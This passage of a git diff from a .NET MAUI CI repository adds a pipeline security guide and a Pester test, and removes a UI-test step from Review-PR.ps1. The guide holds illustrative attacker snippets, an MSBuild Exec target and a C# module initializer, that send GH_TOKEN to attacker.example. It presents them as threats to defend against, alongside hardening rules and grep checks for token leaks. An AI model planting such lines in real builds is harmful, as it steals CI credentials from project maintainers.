+Even when the *calling* script is trusted, the *subprocess* may be PR-controlled. `dotnet build`/`dotnet test`/`dotnet run` execute the PR's MSBuild graph (`Directory.Build.targets`, `.csproj` `<Target>` blocks, source generators, analyzers, then the test/app code). Any of those can read `Environment.GetEnvironmentVariable("GH_TOKEN")` or `$(GH_TOKEN)` MSBuild property and exfiltrate via:
+
+```xml
+<!-- attacker's Directory.Build.targets -->
+<Target Name="Exfil" BeforeTargets="Build">
+  <Exec Command="curl attacker.example/?t=$(GH_TOKEN)" />
+</Target>
+```
+
+```csharp
+// attacker's test code
+[ModuleInitializer]
+public static void Leak() => HttpClient.GetAsync("attacker.example/?t=" +
+    Environment.GetEnvironmentVariable("GH_TOKEN"));
+```
+
+The same applies to invocations of `BuildAndRunHostApp.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1` — all of these *internally* run `dotnet build`/`dotnet test` against PR code.
+
+Use the `Invoke-WithoutGhTokens` helper in `Review-PR.ps1` (or add an equivalent if writing a new orchestration script):
+
+```powershell
+# ✅ correct — token stripped for the subprocess only, restored after
+$testOutput = Invoke-WithoutGhTokens {
+    dotnet test $resolvedProj --filter $t.Filter --logger "console;verbosity=minimal" 2>&1
+}
+```
+
+```powershell
+# ❌ wrong — Gate has GH_TOKEN in env; the PR-modified .csproj inherits it
+$testOutput = dotnet test $resolvedProj --filter $t.Filter ...
+```
+
+**Trusted metadata-fetch scripts** (`Detect-TestsInDiff.ps1`, `Find-RegressionRisks.ps1`, `detect-ui-test-categories.ps1`) call `gh` CLI and **need** `GH_TOKEN`. Don't wrap them. The split is: *trusted script reading PR metadata via `gh`* → keeps `GH_TOKEN`; *trusted script invoking PR-controlled code* → wraps in `Invoke-WithoutGhTokens`.
+
+## Rule 5 — Cross-phase signal files live outside the working tree
+
+The merged worktree is writable by any PR-controlled process. Anything the next phase trusts (gate verdict, sentinel files, category lists, phase-complete markers) must be written to `$(Agent.TempDirectory)` (or `$TRUSTED`), **never** to a path inside `$RepoRoot`.
+
+```powershell
+# ✅ correct — Agent.TempDirectory is per-job, outside the worktree, not writable by PR code
+$gateVerdictDir = if ($env:AGENT_TEMPDIRECTORY) { $env:AGENT_TEMPDIRECTORY } else { Join-Path $RepoRoot "CustomAgentLogsTmp/..." }
+"PASS" | Set-Content (Join-Path $gateVerdictDir "gate-result.txt")
+```
+
+```powershell
+# ❌ wrong — a malicious test in the PR can overwrite gate-result.txt with "PASS"
+"PASS" | Set-Content (Join-Path $RepoRoot "CustomAgentLogsTmp/.../gate-result.txt")
+```
+
+The corresponding sentinel-read in a later phase MUST live at the same trusted location and MUST NOT silently fall back to the worktree path if missing.
+
+## Rule 6 — Strip `##vso[...]` from PR-controlled output
+
+`##vso[task.setvariable variable=X]value` lines in stdout are interpreted by the AzDO agent as commands to set pipeline variables. PR-controlled code (test output, build output) must have those stripped before the agent sees them, otherwise the PR can promote attacker-controlled values into pipeline variables read by subsequent tasks.
+
+```bash
+# ✅ correct — strip CR (Windows line endings would slip past a simpler regex), then drop vso commands
+"$TRUSTED/scripts/Review-PR.ps1" ... 2>&1 | tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'
+```
+
+```bash
+# ❌ wrong — bare sed won't match if PR output has CRLF line endings
+"$TRUSTED/scripts/Review-PR.ps1" ... 2>&1 | sed 's/##vso\[.*\]//g'
+```
+
+## Rule 7 — `gh-aw` workflows: pin version, regenerate `.lock.yml`, restore trusted `.github/`
+
+For files under `.github/workflows/shared/` and any `gh-aw` `.md` workflow:
+
+- **Pin the gh-aw compiler version.** Versions ≥ v0.68.4 strip required permissions (`pull-requests: write`) — see `gh-aw#28767`. Pin to a known-good version in the workflow frontmatter.
+- **Regenerate the `.lock.yml`** with `gh aw compile` **in the same commit** as any `.md` frontmatter change. A stale lock file causes every dispatch to fail with `ERR_CONFIG: Lock file ... is outdated!`.
+- **`workflow_dispatch` triggers must restore trusted `.github/` from main** (use `.github/scripts/Checkout-GhAwPr.ps1` pattern) so that a malicious PR can't supply its own workflow logic via `workflow_dispatch`.
+
+## Rule 8 — Don't pass tokens through pipeline variables that subsequent tasks read
+
+```yaml
+# ❌ wrong — once written to AzDO variable store, the value is visible to every later task
+- bash: echo "##vso[task.setvariable variable=MyToken;issecret=true]$(GH_TOKEN)"
+```
+
+Tokens come from variable groups linked at the pipeline level. Don't republish them. Don't write them to files in the worktree. Don't `echo` them — even with `issecret=true`, this widens the blast radius.
+
+---
+
+## Code-review checklist for this surface
+
+When reviewing or authoring a change to any file matched by this instruction's `applyTo`, walk this list:
+
+- [ ] Every new/modified AzDO `checkout: self` has `persistCredentials: false` (unless the task pushes, in which case add a comment explaining why).
+- [ ] Every new/modified `env:` block on a task contains **only** the tokens that task needs. The Copilot-agent task never has `GH_TOKEN`.
+- [ ] Every new script invoked from the pipeline after PR merge is resolved via `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir` (or the calling script's equivalent), not `$RepoRoot/...`.
+- [ ] If a new script was added to `.github/scripts/`, `.github/skills/`, or `eng/scripts/` that needs to run post-merge, it's covered by the trusted-copy block in `ci-copilot.yml` Setup task.
+- [ ] Every new invocation of `dotnet build|test|run|pack`, `msbuild`, `dotnet cake`, `BuildAndRunHostApp.ps1`, `BuildAndRun*.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1`, or any other process that executes PR-controlled code is wrapped in `Invoke-WithoutGhTokens { ... }`.
+- [ ] Every cross-phase signal file (verdict, sentinel, intermediate state) is written to `$(Agent.TempDirectory)` / `$TRUSTED`, never to `$RepoRoot/...`.
+- [ ] Any new pipeline output that includes stdout from PR-controlled code is filtered with `tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'`.
+- [ ] If a `.github/workflows/*.md` (gh-aw) was edited, the corresponding `.lock.yml` was regenerated with `gh aw compile` in the same commit.
+- [ ] Token names are never written to log lines, even with `Write-Host`/`echo`. Token *values* are never written to files in the worktree.
+
+## Anti-patterns to grep for during review
+
+```bash
+# Token leak to PR-controlled subprocess
+git grep -nE 'dotnet (test|build|run|pack)' eng/pipelines/ci-copilot.yml .github/scripts/ .github/skills/ | grep -v Invoke-WithoutGhTokens
+
+# Script invoked from PR worktree instead of trusted copy
+git grep -nE 'Join-Path \$RepoRoot ".*\.(ps1|sh)"' .github/scripts/ .github/skills/
+
+# Missing persistCredentials
+git grep -nA1 'checkout: self' eng/pipelines/ci-copilot.yml | grep -v persistCredentials
+
+# Cross-phase state in worktree
+git grep -nE 'Set-Content.*\$RepoRoot.*(gate-result|sentinel|verdict)' .github/scripts/ .github/skills/
+
+# Bare ##vso strip without CR handling
+git grep -nE "sed.*##vso" eng/pipelines/ci-copilot.yml | grep -v "tr -d"
+```
+
+---
+
+## References
+
+- **PR #35324** — refactor that introduced the 4-task split and surfaced these issues
+- **MauiBot 2026-05-24 review** of PR #35324 — flagged Rules 3 and 4 violations
+- **PR #35376** — earlier change that re-introduced missing `persistCredentials: false` on cross-stage checkouts
+- **`Review-PR.ps1`** — canonical implementation of `$ScriptsDir`/`$SkillsDir`/`$EngScriptsDir` resolution and `Invoke-WithoutGhTokens` helper
+- **`ci-copilot.yml` Setup task** — canonical trusted-copy + `chmod -R a-w` pattern

--- a/.github/scripts/Post-AISummaryComment.Tests.ps1
+++ b/.github/scripts/Post-AISummaryComment.Tests.ps1
@@ -1,0 +1,75 @@
+#!/usr/bin/env pwsh
+#Requires -Modules Pester
+<#
+.SYNOPSIS
+    Pester tests for pure-function helpers in post-ai-summary-comment.ps1.
+
+.EXAMPLE
+    Invoke-Pester ./Post-AISummaryComment.Tests.ps1
+#>
+
+BeforeAll {
+    $scriptPath = Join-Path $PSScriptRoot 'post-ai-summary-comment.ps1'
+    $tokens = $null
+    $parseErrors = $null
+    $ast = [System.Management.Automation.Language.Parser]::ParseFile($scriptPath, [ref]$tokens, [ref]$parseErrors)
+    if ($parseErrors -and $parseErrors.Count -gt 0) {
+        throw ($parseErrors | ForEach-Object { $_.Message }) -join [Environment]::NewLine
+    }
+
+    $function = $ast.Find({
+        $args[0] -is [System.Management.Automation.Language.FunctionDefinitionAst] -and
+        $args[0].Name -eq 'Test-PhaseContentIsNoOp'
+    }, $true)
+
+    if (-not $function) {
+        throw "Function 'Test-PhaseContentIsNoOp' not found"
+    }
+
+    Invoke-Expression $function.Extent.Text
+}
+
+Describe 'Test-PhaseContentIsNoOp' {
+    It 'suppresses the no-UI-tests placeholder' {
+        Test-PhaseContentIsNoOp `
+            -PhaseKey 'uitests' `
+            -Content 'No UI test categories needed for this PR (no UI-relevant changes).' |
+            Should -BeTrue
+    }
+
+    It 'keeps UI test content when categories or full matrix are present' {
+        Test-PhaseContentIsNoOp `
+            -PhaseKey 'uitests' `
+            -Content '**Detected UI test categories:** `Button,Entry`' |
+            Should -BeFalse
+
+        Test-PhaseContentIsNoOp `
+            -PhaseKey 'uitests' `
+            -Content 'Full UI test matrix will run (no specific categories detected from PR changes).' |
+            Should -BeFalse
+    }
+
+    It 'suppresses regression placeholders when there are no implementation files or risks' {
+        Test-PhaseContentIsNoOp `
+            -PhaseKey 'regression-check' `
+            -Content '🟢 No implementation files modified — skipping regression cross-reference.' |
+            Should -BeTrue
+
+        Test-PhaseContentIsNoOp `
+            -PhaseKey 'regression-check' `
+            -Content "## 🔍 Regression Cross-Reference`n`n🟢 No regression risks detected. No labeled bug-fix PRs in the last 6 months touched the modified files." |
+            Should -BeTrue
+    }
+
+    It 'keeps actionable regression content' {
+        Test-PhaseContentIsNoOp `
+            -PhaseKey 'regression-check' `
+            -Content "## 🔍 Regression Cross-Reference`n`n🟡 **Overlaps with prior bug-fix PRs** — same files modified, but no exact line revert detected." |
+            Should -BeFalse
+
+        Test-PhaseContentIsNoOp `
+            -PhaseKey 'regression-check' `
+            -Content '⚠️ Regression cross-reference failed: gh api failed' |
+            Should -BeFalse
+    }
+}

--- a/.github/scripts/Review-PR.ps1
+++ b/.github/scripts/Review-PR.ps1
@@ -7,13 +7,15 @@
     
     Step 1: Branch setup           - Create review branch from main, merge PR squashed
     Step 2: Detect UI categories   - Run eng/scripts/detect-ui-test-categories.ps1 (info only)
-    Step 3: Run detected UI tests  - Execute BuildAndRunHostApp.ps1 per detected category (informational)
-    Step 4: Regression cross-ref   - Run Find-RegressionRisks.ps1 + run any tests from prior fix PRs
-    Step 5: Gate                   - Run test verification directly (verify-tests-fail.ps1)
-    Step 6: Multi-candidate review - Pre-Flight, then PARALLEL (expert-reviewer eval of PR + Try-Fix×4),
+    Step 3: Regression cross-ref   - Run Find-RegressionRisks.ps1 + run any tests from prior fix PRs
+    Step 4: Gate                   - Run test verification directly (verify-tests-fail.ps1)
+    Step 5: Multi-candidate review - Pre-Flight, then PARALLEL (expert-reviewer eval of PR + Try-Fix×4),
                                      then Report compares all candidates and writes winner.json
-    Step 7: Post AI Summary        - Directly runs posting scripts
-    Step 8: Apply labels           - Apply agent labels based on review results
+    Step 6: Post AI Summary        - Directly runs posting scripts
+    Step 7: Apply labels           - Apply agent labels based on review results
+
+    NOTE: Full-category UI test runs happen in the RunDeepUITests stage (ci-copilot.yml Stage 2),
+    not here. This script only runs targeted PR-specific tests in the Gate (Step 4).
 
     By default, the script checks out main and creates a review branch from it.
     If squash-merge conflicts, the script posts a comment on the PR and exits.
@@ -395,8 +397,8 @@ if ($Phase -and $Phase -ne 'Setup') {
 
 # ─── Helper: Parse `dotnet test --logger "console;verbosity=detailed"` ──────
 # Extracts per-test results (Passed/Failed/Skipped) plus failure messages and
-# stack traces from raw stdout. Used by STEP 3 so the AI summary comment shows
-# WHICH tests failed and WHY, not just an aggregate exit code.
+# stack traces from raw stdout. Used by the RunDeepUITests stage and Gate so the
+# AI summary comment shows WHICH tests failed and WHY, not just an aggregate exit code.
 function Get-DotNetTestResults {
     param([string[]]$Lines)
 
@@ -476,7 +478,7 @@ function Get-DotNetTestResults {
 #   --logger "trx;LogFileName=<sanitized>.trx" --results-directory <dir>
 # The TRX is the same format AzDO's PublishTestResults@2 ingests, so it has
 # every test's outcome, duration, error message and stack trace — without
-# any console-scrape ambiguity. STEP 3 prefers TRX when available because
+# any console-scrape ambiguity. The RunDeepUITests stage and Gate prefer TRX when
 # parsing console output is fragile when many tests run, lines wrap, or
 # multi-line ErrorRecords get glued together by PowerShell stream merging.
 # Get-TrxResults: defined inline because Review-PR.ps1 is invoked by
@@ -812,458 +814,12 @@ if ($LASTEXITCODE -ne 0) {
 }
 
 # ═════════════════════════════════════════════════════════════════════════════
-#  STEP 3: RUN DETECTED UI TEST CATEGORIES (script, no copilot agent)
-# ═════════════════════════════════════════════════════════════════════════════
-# Runs the UI test categories that Step 2 detected. Skipped when:
-#   - $uitestCategories is 'NONE'        (no UI-relevant changes)
-#   - $uitestCategories is empty/blank    (run-all matrix — too expensive locally)
-# Results are appended to the existing uitests/content.md so they show up in
-# the same collapsible section of the AI summary comment.
-
-Write-Host ""
-Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
-Write-Host "║  STEP 3: RUN DETECTED UI TESTS                            ║" -ForegroundColor Cyan
-Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
-
-$uitestRunResult = "SKIPPED"
-$uitestRunnerScript = Join-Path $ScriptsDir "BuildAndRunHostApp.ps1"
-
-if ($uitestCategories -eq 'NONE') {
-    Write-Host "  ⏭️  Skipped — detection returned NONE (no UI-relevant changes)" -ForegroundColor DarkGray
-} elseif ([string]::IsNullOrWhiteSpace($uitestCategories)) {
-    Write-Host "  ⏭️  Skipped — detection returned the run-all matrix (too expensive to run all categories locally)" -ForegroundColor DarkGray
-} elseif (-not (Test-Path $uitestRunnerScript)) {
-    Write-Host "  ⚠️ BuildAndRunHostApp.ps1 not found — cannot run UI tests" -ForegroundColor Yellow
-} else {
-    # Mirror the regression-test platform fallback so a $Platform-less invocation
-    # still has a concrete target instead of silently picking nothing.
-    $uitestPlatform = if ($Platform) { $Platform } else { "android" }
-
-    $categoryList = @($uitestCategories -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ })
-    Write-Host "  🧪 Running $($categoryList.Count) detected UI category(ies) on '$uitestPlatform'…" -ForegroundColor Cyan
-
-    $uitestRunOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/uitests"
-    New-Item -ItemType Directory -Force -Path $uitestRunOutputDir | Out-Null
-
-    $uitestPassed = 0
-    $uitestFailed = 0
-    $uitestSkipped = 0
-    $uitestDetails = @()
-
-    foreach ($cat in $categoryList) {
-        Write-Host ""
-        Write-Host "  📋 [$cat] Invoke-UITestWithRetry -Platform $uitestPlatform -Category $cat" -ForegroundColor Cyan
-
-        # Delegate to the shared deploy+retry script so STEP 3 uses the
-        # SAME pre-boot + retry-on-env-error + device-reboot pipeline as
-        # the Gate (verify-tests-fail.ps1's Invoke-TestRun +
-        # Invoke-TestRunWithRetry). When the Android emulator/iOS sim
-        # rejects an install ("ADB0010 Broken pipe", XHarness exit 83,
-        # AppiumServerHasNotBeenStartedLocally, …) the helper retries up
-        # to 3 times with adb reboot / simctl boot recovery between
-        # attempts. Without this, a single transient install failure was
-        # turning into "119 OneTimeSetUp timeouts" in the AI summary.
-        $catLogPath = Join-Path $uitestRunOutputDir ("$cat-output.log")
-        $catStart = Get-Date
-        $sharedRunner = Join-Path $ScriptsDir "shared/Invoke-UITestWithRetry.ps1"
-        $runResult = $null
-        $testOutput = @()
-        $testExitCode = -1
-        $envErrHit = $null
-        try {
-            $runResult = Invoke-WithoutGhTokens { & $sharedRunner `
-                -Platform $uitestPlatform `
-                -Category $cat `
-                -RepoRoot $RepoRoot `
-                -LogFile $catLogPath
-            }
-            if ($runResult) {
-                $testOutput   = $runResult.Output
-                $testExitCode = $runResult.ExitCode
-                $envErrHit    = $runResult.EnvErrorHit
-                Write-Host "    Attempts: $($runResult.Attempts) · Exit: $testExitCode · EnvError: $envErrHit" -ForegroundColor Gray
-                $testOutput | Select-Object -Last 20 | ForEach-Object { Write-Host "    $_" }
-            }
-        } catch {
-            Write-Host "    ⚠️ Shared runner threw: $_" -ForegroundColor Yellow
-            $testExitCode = -1
-        }
-        $catDuration = [math]::Round(((Get-Date) - $catStart).TotalSeconds, 1)
-
-        # Parse per-test results. We prefer the TRX file written by
-        # `dotnet test --logger trx` (mirrors CI pipeline 313's
-        # `RunTestWithLocalDotNet`) — it's authoritative because it captures
-        # every test's outcome, duration, error and stack regardless of
-        # how the console output got wrapped or interleaved. We only fall
-        # back to scraping the captured stdout via Get-DotNetTestResults
-        # when the TRX is missing (build/deploy crashed before tests ran,
-        # or an older BuildAndRunHostApp.ps1 ran without --logger trx).
-        $perTestResults = @()
-        $trxAggregate   = $null
-        $trxPath        = if ($runResult) { [string]$runResult.TrxResultFile } else { $null }
-        if ($trxPath -and (Test-Path $trxPath)) {
-            try {
-                $trxAggregate = Get-TrxResults -TrxPath $trxPath
-                if ($trxAggregate) {
-                    $perTestResults = @($trxAggregate.Results)
-                    Write-Host "    📄 TRX parsed: total=$($trxAggregate.Total) passed=$($trxAggregate.Passed) failed=$($trxAggregate.Failed) skipped=$($trxAggregate.Skipped)" -ForegroundColor Cyan
-                }
-            } catch {
-                Write-Host "    ⚠️ Failed to parse TRX $trxPath : $_" -ForegroundColor Yellow
-            }
-        }
-        if (-not $trxAggregate) {
-            try {
-                $perTestResults = @(Get-DotNetTestResults -Lines $testOutput)
-            } catch {
-                Write-Host "    ⚠️ Failed to parse per-test results: $_" -ForegroundColor Yellow
-            }
-        }
-        $catFailedTests = @($perTestResults | Where-Object { $_.status -eq 'Failed' })
-        $catPassedTests = @($perTestResults | Where-Object { $_.status -eq 'Passed' })
-        # Authoritative aggregate counts: TRX > per-test array. (When the TRX
-        # is present its <Counters total="N" .../> attribute beats counting
-        # array items because VSTest may report retries/skips that aren't in
-        # individual <UnitTestResult> nodes.)
-        if ($trxAggregate) {
-            $catTotalCount  = [int]$trxAggregate.Total
-            $catPassedCount = [int]$trxAggregate.Passed
-            $catFailedCount = [int]$trxAggregate.Failed
-        } else {
-            $catTotalCount  = $perTestResults.Count
-            $catPassedCount = $catPassedTests.Count
-            $catFailedCount = $catFailedTests.Count
-        }
-
-        if ($testExitCode -eq 0) {
-            Write-Host "    ✅ PASSED ($catDuration s, $catPassedCount test(s))" -ForegroundColor Green
-            $uitestPassed++
-            $uitestDetails += @{
-                category     = $cat
-                result       = 'PASSED'
-                duration_s   = $catDuration
-                tests_total  = $catTotalCount
-                tests_passed = $catPassedCount
-                tests_failed = 0
-                passed_tests = @($catPassedTests | ForEach-Object { @{ name = $_.name; duration = $_.duration } })
-                failed_tests = @()
-            }
-        } elseif ($testExitCode -eq -1) {
-            Write-Host "    ⏭️ SKIPPED" -ForegroundColor DarkGray
-            $uitestSkipped++
-            $uitestDetails += @{
-                category     = $cat
-                result       = 'SKIPPED'
-                duration_s   = $catDuration
-                reason       = 'Runner threw an exception'
-                tests_total  = 0
-                tests_passed = 0
-                tests_failed = 0
-                passed_tests = @()
-                failed_tests = @()
-            }
-        } else {
-            Write-Host "    ❌ FAILED (exit code: $testExitCode, $catDuration s, $catFailedCount failed test(s))" -ForegroundColor Red
-            foreach ($ft in $catFailedTests) {
-                Write-Host "       • $($ft.name)" -ForegroundColor Red
-            }
-            $uitestFailed++
-            # When per-test parsing found no failures (e.g. build/deploy
-            # crashed before tests ran), capture the last 30 lines of the
-            # category's stdout so the AI summary can show the actual error
-            # (CS0246, RS0016, missing dependency, etc.) instead of just
-            # "exit code 1".
-            $buildTail = $null
-            if ($catFailedCount -eq 0) {
-                try {
-                    $tail = @($testOutput | ForEach-Object { "$_" } | Select-Object -Last 30)
-                    $buildTail = ($tail -join "`n").Trim()
-                } catch { $buildTail = $null }
-            }
-            # Detect infrastructure-level failure: when ALL failures share a
-            # OneTimeSetUp timeout AND the build log shows the HostApp couldn't
-            # be installed/launched (ADB install failure, broken pipe, no
-            # device, etc.), this is a CI infra problem — not real test
-            # regressions. Reviewers shouldn't be alarmed by "119 failed tests"
-            # when the app never even started.
-            #
-            # If $envErrHit was set above, use that — the retry loop already
-            # detected an env error and exhausted retries.
-            # Load shared env-error patterns (single source of truth).
-            $sharedPatternsScript = Join-Path $ScriptsDir "shared/Get-EnvErrorPatterns.ps1"
-            if (Test-Path $sharedPatternsScript) {
-                . $sharedPatternsScript
-                $infraSignals = Get-EnvErrorPatterns
-            } else {
-                $infraSignals = @(
-                    'InstallFailedException',
-                    'Failure calling service package',
-                    'ADB0010',
-                    'Broken pipe',
-                    'no devices/emulators found',
-                    'device offline',
-                    'Could not connect to device',
-                    'Failed to launch the application',
-                    'cmd: Failure'
-                )
-            }
-            $infraReason = $envErrHit
-            if (-not $infraReason -and $catFailedTests.Count -gt 0) {
-                # Two equally-strong infra-failure indicators:
-                #   (a) every failure is `OneTimeSetUp:` — driver couldn't
-                #       reach the runner UI button.
-                #   (b) the build itself failed (`Build FAILED`) and there
-                #       are zero passes — NUnit then "fails" every test in
-                #       the assembly because the HostApp APK never got
-                #       installed.
-                $logText = ($testOutput | ForEach-Object { "$_" }) -join "`n"
-                $allOneTimeSetup = @($catFailedTests | Where-Object {
-                    ($_.error -as [string]) -match '^OneTimeSetUp:'
-                }).Count -eq $catFailedTests.Count
-                $buildFailedNoPasses = ($catPassedCount -eq 0) -and ($logText -match '(?m)^Build FAILED\.\s*$')
-                if ($allOneTimeSetup -or $buildFailedNoPasses) {
-                    foreach ($sig in $infraSignals) {
-                        if ($logText -match $sig) {
-                            $infraReason = $sig
-                            break
-                        }
-                    }
-                }
-            }
-            $uitestDetails += @{
-                category     = $cat
-                result       = 'FAILED'
-                duration_s   = $catDuration
-                exit_code    = $testExitCode
-                tests_total  = $catTotalCount
-                tests_passed = $catPassedCount
-                tests_failed = $catFailedCount
-                build_tail   = $buildTail
-                infra_failure = $infraReason
-                trx_path     = $trxPath
-                passed_tests = @($catPassedTests | ForEach-Object { @{ name = $_.name; duration = $_.duration } })
-                failed_tests = @($catFailedTests | ForEach-Object {
-                    @{
-                        name     = $_.name
-                        duration = $_.duration
-                        error    = $_.error
-                        stack    = $_.stack
-                    }
-                })
-            }
-        }
-    }
-
-    if ($uitestFailed -gt 0) {
-        $uitestRunResult = "FAILED"
-        Write-Host ""
-        Write-Host "  🔴 UI test result: $uitestPassed passed, $uitestFailed FAILED, $uitestSkipped skipped" -ForegroundColor Red
-    } elseif ($uitestPassed -gt 0) {
-        $uitestRunResult = "PASSED"
-        Write-Host ""
-        Write-Host "  ✅ UI test result: $uitestPassed passed, $uitestSkipped skipped" -ForegroundColor Green
-    } else {
-        $uitestRunResult = "SKIPPED"
-        Write-Host ""
-        Write-Host "  ⏭️  All UI categories skipped ($uitestSkipped total)" -ForegroundColor DarkGray
-    }
-
-    # Append a results table to the existing uitests/content.md so the same
-    # collapsible "UI Tests — Category Detection" section in the AI summary
-    # comment now contains both the detected list and the run results.
-    $uitestContentFile = Join-Path $uitestRunOutputDir "content.md"
-    $appendMd = New-Object System.Text.StringBuilder
-    [void]$appendMd.AppendLine()
-    [void]$appendMd.AppendLine("### 🧪 UI Test Execution Results")
-    [void]$appendMd.AppendLine()
-    $resultIcon = switch ($uitestRunResult) { "PASSED" { "✅" }; "FAILED" { "❌" }; default { "⏭️" } }
-    [void]$appendMd.AppendLine("$resultIcon **$uitestRunResult** — $uitestPassed passed, $uitestFailed failed, $uitestSkipped skipped (platform: ``$uitestPlatform``)")
-    [void]$appendMd.AppendLine()
-    if ($uitestDetails.Count -gt 0) {
-        [void]$appendMd.AppendLine("| Category | Result | Tests | Duration | Notes |")
-        [void]$appendMd.AppendLine("|---|---|---|---|---|")
-        foreach ($d in $uitestDetails) {
-            $icon = switch ($d.result) { "PASSED" { "✅" }; "FAILED" { "❌" }; default { "⏭️" } }
-            # Tests column: e.g. "1/1 ✓" on pass, "0/1 (1 ❌)" on fail. When the
-            # category itself failed but no per-test failures were parsed (e.g.
-            # build/deploy crashed before tests ran), don't claim a green ✓ —
-            # show "build/deploy failed" so reviewers aren't misled.
-            $tCount = if ($null -ne $d.tests_total) { [int]$d.tests_total } else { 0 }
-            $tPass  = if ($null -ne $d.tests_passed) { [int]$d.tests_passed } else { 0 }
-            $tFail  = if ($null -ne $d.tests_failed) { [int]$d.tests_failed } else { 0 }
-            $testsCol = if ($d.infra_failure) {
-                            "🛠️ infra failure ($tFail bogus failures)"
-                        }
-                        elseif ($d.result -eq 'FAILED' -and $tFail -eq 0) {
-                            if ($tCount -eq 0) { "build/deploy failed" }
-                            else { "$tPass/$tCount — build/deploy failed before per-test results" }
-                        }
-                        elseif ($tCount -eq 0) { "—" }
-                        elseif ($tFail -gt 0) { "$tPass/$tCount ($tFail ❌)" }
-                        else { "$tPass/$tCount ✓" }
-            $notes = if ($d.infra_failure) { "infra: $($d.infra_failure)" }
-                     elseif ($d.exit_code) { "exit code $($d.exit_code)" }
-                     elseif ($d.reason)    { $d.reason }
-                     else                  { "" }
-            [void]$appendMd.AppendLine("| ``$($d.category)`` | $icon $($d.result) | $testsCol | $($d.duration_s)s | $notes |")
-        }
-    }
-    [void]$appendMd.AppendLine()
-
-    # Per-failed-category breakdown: collapsible block with each failed test's
-    # name, error message, and first stack frame so a reviewer can diagnose
-    # without downloading the full build artifact. When a category failed but
-    # produced no per-test failures (build/deploy crashed), surface the last
-    # 30 lines of stdout so the AI summary still pinpoints the cause.
-    $failedCats = @($uitestDetails | Where-Object { $_.result -eq 'FAILED' -and (($_.failed_tests -and $_.failed_tests.Count -gt 0) -or $_.build_tail) })
-    $infraCats = @($failedCats | Where-Object { $_.infra_failure })
-    if ($infraCats.Count -gt 0) {
-        [void]$appendMd.AppendLine("> ⚠️ **Infrastructure failure detected** — for $($infraCats.Count) categor$(if ($infraCats.Count -eq 1) { 'y' } else { 'ies' }) below, the HostApp couldn't be installed or launched on the device (build/deploy failed). NUnit then reports every test in the assembly as failed. **These are NOT real test regressions** — the test runner never started. Look for ``$($infraCats[0].infra_failure)`` in the build log.")
-        [void]$appendMd.AppendLine()
-    }
-    if ($failedCats.Count -gt 0) {
-        [void]$appendMd.AppendLine("#### Failed test details")
-        [void]$appendMd.AppendLine()
-        foreach ($d in $failedCats) {
-            $hasFailedTests = $d.failed_tests -and $d.failed_tests.Count -gt 0
-            $headSummary = if ($d.infra_failure) {
-                "🛠️ <code>$($d.category)</code> — infra failure ($($d.failed_tests.Count) bogus failures, app never installed)"
-            } elseif ($hasFailedTests) {
-                "❌ <code>$($d.category)</code> — $($d.failed_tests.Count) failed test$(if ($d.failed_tests.Count -ne 1) { 's' })"
-            } else {
-                "❌ <code>$($d.category)</code> — build/deploy failed (no per-test results)"
-            }
-            [void]$appendMd.AppendLine("<details><summary>$headSummary</summary>")
-            [void]$appendMd.AppendLine()
-            if ($hasFailedTests) {
-                # GitHub's comment body limit is 65,536 chars; large categories
-                # can have 100+ failures with multi-KB error messages each.
-                # Group by error message to dedup the common "OneTimeSetUp:
-                # Timed out…" cases (one root cause, N tests). Show full
-                # detail for the first 5 unique errors, then a compact list.
-                # @() wrap is required: Group-Object on a single unique key
-                # returns ONE GroupInfo (not an array), and `.Count` on a
-                # GroupInfo returns the size of the group, not the number of
-                # groups — without @() the foreach below would iterate the
-                # group's members instead of the groups themselves.
-                $byErr = @($d.failed_tests | Group-Object -Property {
-                    if ($_.error) { ($_.error -as [string]).Substring(0, [Math]::Min(200, ([string]$_.error).Length)) } else { '<no error>' }
-                } | Sort-Object Count -Descending)
-
-                $shownGroups = 0
-                foreach ($g in $byErr) {
-                    if ($shownGroups -ge 5) {
-                        $remaining = ($byErr | Select-Object -Skip 5 | Measure-Object -Property Count -Sum).Sum
-                        [void]$appendMd.AppendLine("…and $remaining more failure(s) with other error signatures (see CopilotLogs artifact for full detail).")
-                        [void]$appendMd.AppendLine()
-                        break
-                    }
-                    $shownGroups++
-
-                    $first = $g.Group[0]
-                    $count = $g.Count
-                    if ($count -gt 1) {
-                        $sampleNames = ($g.Group | Select-Object -First 3 | ForEach-Object { "``$($_.name)``" }) -join ', '
-                        $more = if ($count -gt 3) { ", … (+$($count - 3) more)" } else { '' }
-                        [void]$appendMd.AppendLine("**$count tests failed with the same error** — e.g. $sampleNames$more")
-                    } else {
-                        [void]$appendMd.AppendLine("**``$($first.name)``** *(took $($first.duration))*")
-                    }
-                    [void]$appendMd.AppendLine()
-
-                    $errBody = if ($first.error) {
-                        $e = [string]$first.error
-                        if ($e.Length -gt 1500) { $e.Substring(0, 1500) + "`n…(truncated)" } else { $e }
-                    } else { "_(no error message captured)_" }
-                    [void]$appendMd.AppendLine('```')
-                    [void]$appendMd.AppendLine($errBody)
-                    [void]$appendMd.AppendLine('```')
-                    if ($first.stack) {
-                        $firstFrame = ($first.stack -split "`n" | Where-Object { $_.Trim() } | Select-Object -First 1)
-                        if ($firstFrame) {
-                            [void]$appendMd.AppendLine("> at $($firstFrame.Trim().TrimStart('a','t',' '))")
-                            [void]$appendMd.AppendLine()
-                        }
-                    }
-                }
-
-                # Always print a compact name-only list of every failed test
-                # so reviewers know exactly which tests need to be re-run,
-                # even if their error matched a deduped group above.
-                if ($d.failed_tests.Count -gt 1) {
-                    [void]$appendMd.AppendLine("<details><summary>All $($d.failed_tests.Count) failed test names</summary>")
-                    [void]$appendMd.AppendLine()
-                    foreach ($ft in $d.failed_tests) {
-                        [void]$appendMd.AppendLine("- ``$($ft.name)``")
-                    }
-                    [void]$appendMd.AppendLine()
-                    [void]$appendMd.AppendLine("</details>")
-                    [void]$appendMd.AppendLine()
-                }
-            }
-            if ($d.build_tail) {
-                $tail = [string]$d.build_tail
